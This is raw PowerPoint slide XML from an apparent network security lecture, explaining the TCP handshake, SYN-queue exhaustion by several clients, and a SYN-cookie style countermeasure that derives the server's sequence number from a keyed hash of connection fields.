            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8141890" y="1605131"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7439094" y="1606229"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756032" y="1607325"/>
            <a:ext cx="705000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6098192" y="1608425"/>
            <a:ext cx="679783" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356095" y="1806871"/>
            <a:ext cx="679783" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" b="1" dirty="0"/>
              <a:t>client5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6651873" y="1282790"/>
            <a:ext cx="1257572" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN queue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3105013" y="1866741"/>
            <a:ext cx="5741877" cy="8040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4657519" y="1684075"/>
            <a:ext cx="2980023" cy="1401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21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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server does not save the client information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390641" y="1355154"/>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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674445" y="1343100"/>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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013076" y="2473485"/>
            <a:ext cx="1901163" cy="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81468" y="2126759"/>
            <a:ext cx="1138066" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053645" y="3342932"/>
            <a:ext cx="1901163" cy="657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9185" y="3030194"/>
            <a:ext cx="2215828" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=y, ACK=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067902" y="4212379"/>
            <a:ext cx="1901163" cy="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69224" y="3899641"/>
            <a:ext cx="1839758" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>ACK=y+1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167850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187615" cy="5727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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If client sends ACK only</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390641" y="1355154"/>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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674445" y="1343100"/>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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067902" y="4212379"/>
            <a:ext cx="1901163" cy="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69224" y="3899641"/>
            <a:ext cx="1839758" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>ACK=y+1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4996625" y="1682864"/>
            <a:ext cx="4081586" cy="232352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None/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Aria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pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If client sends ACK only, server should accept, because it does not have the (real) client record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>still vulnerable!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171973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Countermeasure: compute y secretly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390641" y="1355154"/>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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674445" y="1343100"/>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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013076" y="2473485"/>
            <a:ext cx="1901163" cy="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81468" y="2126759"/>
            <a:ext cx="1138066" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053645" y="3342932"/>
            <a:ext cx="1901163" cy="657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9185" y="3030194"/>
            <a:ext cx="2215828" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=y, ACK=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067902" y="4212379"/>
            <a:ext cx="1901163" cy="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69224" y="3899641"/>
            <a:ext cx="1839758" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>ACK=y+1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>=x+1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5775849" y="2033827"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289130" y="2216927"/>
            <a:ext cx="2657680" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>y=H(K,          )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4408633" y="3686106"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3322100" y="3973364"/>
            <a:ext cx="5756116" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Extract                  from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACK packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>; check y=H(K,              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>) ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7731823" y="3489851"/>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5262734" y="1414360"/>
            <a:ext cx="1078861" cy="802567"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">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94223" y="1276214"/>
            <a:ext cx="1776173" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>Server secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111248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Shape 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193288" y="4440429"/>
            <a:ext cx="8520600" cy="525454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ambassador Bridge Blockade</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
